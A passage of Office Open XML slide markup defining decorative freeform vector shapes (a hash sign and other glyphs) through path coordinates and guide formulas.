                  <a:gd name="T49" fmla="*/ 68 h 219"/>
                  <a:gd name="T50" fmla="*/ 137 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 158 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 188"/>
                  <a:gd name="T55" fmla="*/ 68 h 219"/>
                  <a:gd name="T56" fmla="*/ 188 w 188"/>
                  <a:gd name="T57" fmla="*/ 68 h 219"/>
                  <a:gd name="T58" fmla="*/ 120 w 188"/>
                  <a:gd name="T59" fmla="*/ 85 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 85 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 109 w 188"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 120 w 188"/>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9">
                    <a:moveTo>
                      <a:pt x="188" y="68"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="68"/>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Freeform 256"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6159"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257"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6357"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Freeform 258"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6506" y="9"/>
                <a:ext cx="154" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 127"/>
                  <a:gd name="T3" fmla="*/ 145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259"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6701"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Freeform 260"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6898"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261"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7045"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Freeform 262"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7244" y="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263"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7392"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Freeform 264"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7589"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265"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7739"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Freeform 266"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3986" y="0"/>
                <a:ext cx="219"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6 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48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09" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>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9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="133"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32"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7"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="102" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159"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9"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>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5"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="97" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="66"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="101" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="72"/>
                      <a:pt x="90" y="75"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>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100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="51" y="109"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="124"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>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70"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="177"/>
                      <a:pt x="64" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="196"/>
                      <a:pt x="70" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70"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6" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="191"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="196"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="119" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135"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2" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105"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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="86" y="41"/>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6" y="33"/>
                      <a:pt x="65" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74"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6"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96"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5"/>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267"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4077" y="5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Freeform 268"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4089" y="59"/>
                <a:ext cx="4" cy="2"/>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269"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="20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Freeform 270"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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271"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="242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Freeform 272"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2620"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273"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2770"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Freeform 274"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2918"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275"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="311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Freeform 276"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="326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Freeform 277"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="345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Freeform 278"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3656"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279"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3805" y="739"/>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Freeform 280"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="743"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 85 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 85 h 219"/>
                  <a:gd name="T6" fmla="*/ 132 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 152 h 219"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 152 h 219"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 93 w 189"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 152 h 219"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 152 h 219"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 152 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 152 h 219"/>
                  <a:gd name="T30" fmla="*/ 4 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 85 h 219"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 85 h 219"/>
                  <a:gd name="T38" fmla="*/ 16 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 61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60 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
